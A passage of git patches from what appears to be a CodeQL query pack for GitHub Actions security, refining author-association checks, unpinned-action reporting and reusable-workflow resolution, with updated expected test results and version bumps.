.github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From db328f0b164f91338280a0b485a6ecf8df52a85d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 18:24:08 +0200 Subject: [PATCH 0512/1267] Improve Association check --- .../codeql/actions/security/ControlChecks.qll | 27 ++++++++++--------- 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 650ae8d8105..26bee3ca3a6 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -66,7 +66,7 @@ abstract class ControlCheck extends AstNode { } abstract class AssociationCheck extends ControlCheck { - // Checks if the actor is a COLLABORATOR of the repo + // Checks if the actor is a MEMBER/OWNER the repo // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { @@ -182,23 +182,26 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { class AssociationIfCheck extends AssociationCheck instanceof If { AssociationIfCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.comment\\.author_association\\b", - "\\bgithub\\.event\\.issue\\.author_association\\b", - "\\bgithub\\.event\\.pull_request\\.author_association\\b", - ], _, _) - ) + normalizeExpr(this.getCondition()) + .splitAt("\n") + .regexpMatch([ + ".*\\bgithub\\.event\\.comment\\.author_association\\b.*", + ".*\\bgithub\\.event\\.issue\\.author_association\\b.*", + ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*", + ]) and + normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bMEMBER\\b.*") and + normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bOWNER\\b.*") } } class AssociationActionCheck extends AssociationCheck instanceof UsesStep { AssociationActionCheck() { this.getCallee() = "TheModdingInquisition/actions-team-membership" and - not exists(this.getArgument("exit")) - or - this.getArgument("exit") = "true" + ( + not exists(this.getArgument("exit")) + or + this.getArgument("exit") = "true" + ) } } From c3d7af8f59383e55202ce3b7575b05bba2861952 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 18:44:23 +0200 Subject: [PATCH 0513/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 285f9cfe523..9a798b891ba 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.45 +version: 0.1.46 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 3c02acfff19..01b36fe62cd 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.45 +version: 0.1.46 groups: [actions, queries] suites: codeql-suites extractor: javascript From c20e407c16931300a355790e14d77864cb92d593 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 11:52:44 +0200 Subject: [PATCH 0514/1267] Modify UnpinnedActionsTag report node --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 6 ++ ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- .../CWE-829/UnpinnedActionsTag.expected | 62 +++++++++---------- 4 files changed, 40 insertions(+), 32 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 23832b35bd5..c83abb1ea1d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -264,6 +264,8 @@ class Environment extends AstNode instanceof EnvironmentImpl { abstract class Uses extends AstNode instanceof UsesImpl { string getCallee() { result = super.getCallee() } + ScalarValue getCalleeNode() { result = super.getCalleeNode() } + string getVersion() { result = super.getVersion() } int getMajorVersion() { result = super.getMajorVersion() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 23b5ead7f0e..2267c7ff694 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1147,6 +1147,8 @@ class EnvImpl extends AstNodeImpl, TEnvNode { abstract class UsesImpl extends AstNodeImpl { abstract string getCallee(); + abstract ScalarValueImpl getCalleeNode(); + abstract string getVersion(); int getMajorVersion() { @@ -1197,6 +1199,8 @@ class UsesStepImpl extends StepImpl, UsesImpl { else result = u.getValue() } + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } @@ -1230,6 +1234,8 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index ecdb1d06526..10c21bc368b 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -33,6 +33,6 @@ where uses.getVersion() = version and not isTrustedOrg(repo) and not isPinnedCommit(version) -select uses, +select uses.getCalleeNode(), "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 5d38b397a42..008c3696789 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,31 +1,31 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | -| .github/workflows/test13.yml:14:7:20:4 | Uses Step | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:13:19:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:13:23:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:14:15:14:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:27:15:27:52 | xt0rted/pull-request-comment-branch@v2 | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:41:15:41:42 | eficode/resolve-pr-refs@main | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | +| .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | +| .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:13:10:22 | foo/bar@v1 | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From e9dfd9ccb47779758284657133ec9a5a99938429 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 11:54:00 +0200 Subject: [PATCH 0515/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9a798b891ba..07221cd05bb 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.46 +version: 0.1.47 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 01b36fe62cd..2048e94e7ec 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.46 +version: 0.1.47 groups: [actions, queries] suites: codeql-suites extractor: javascript From 116d83da5f071d6dd5f36af7a62b2f244737240a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 15:40:41 +0200 Subject: [PATCH 0516/1267] Improve reusable workflow calls --- .../actions/dataflow/internal/DataFlowPrivate.qll | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 0d214c63c5d..1159ccb53ae 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -98,6 +98,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflow then + //result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() result = this.(ReusableWorkflow) .getLocation() @@ -107,7 +108,17 @@ class DataFlowCallable instanceof Cfg::CfgScope { .getLocation() .getFile() .getRelativePath() - .indexOf("/.github/workflows") + 1) + .indexOf("/.github/workflows") + 1) or + result = + this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .suffix(this.(ReusableWorkflow) + .getLocation() + .getFile() + .getRelativePath() + .indexOf(".github/workflows")) else if this instanceof CompositeAction then From a1e44bc918406b7a55cee9a65a054d9e62d0532e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 15:42:19 +0200 Subject: [PATCH 0517/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 07221cd05bb..8135237d6ce 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.47 +version: 0.1.48 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2048e94e7ec..a40d5868789 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.47 +version: 0.1.48 groups: [actions, queries] suites: codeql-suites extractor: javascript From d44e7aee0ad948eab1e703ffc8e53351cf077cb7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 22 Sep 2024 22:05:39 +0200 Subject: [PATCH 0518/1267] Cross remote Reusable Workflow analysis --- ql/lib/codeql/actions/Helper.qll | 16 +++++++ .../dataflow/internal/DataFlowPrivate.qll | 48 ++++++++++--------- .../CWE-094/CodeInjectionCritical.expected | 6 +++ .../CWE-094/CodeInjectionMedium.expected | 5 ++ .../TestRepo/.github/workflows/reusable.yml | 29 +++++++++++ .../.github/workflows/reusable_caller1.yaml | 11 +++++ .../.github/workflows/reusable_caller2.yaml | 11 +++++ .../.github/workflows/reusable_caller3.yaml | 11 +++++ .../.github/workflows/reusable_local.yml | 29 +++++++++++ .../UntrustedCheckoutCritical.expected | 4 ++ 10 files changed, 147 insertions(+), 23 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller1.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller2.yaml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml create mode 100644 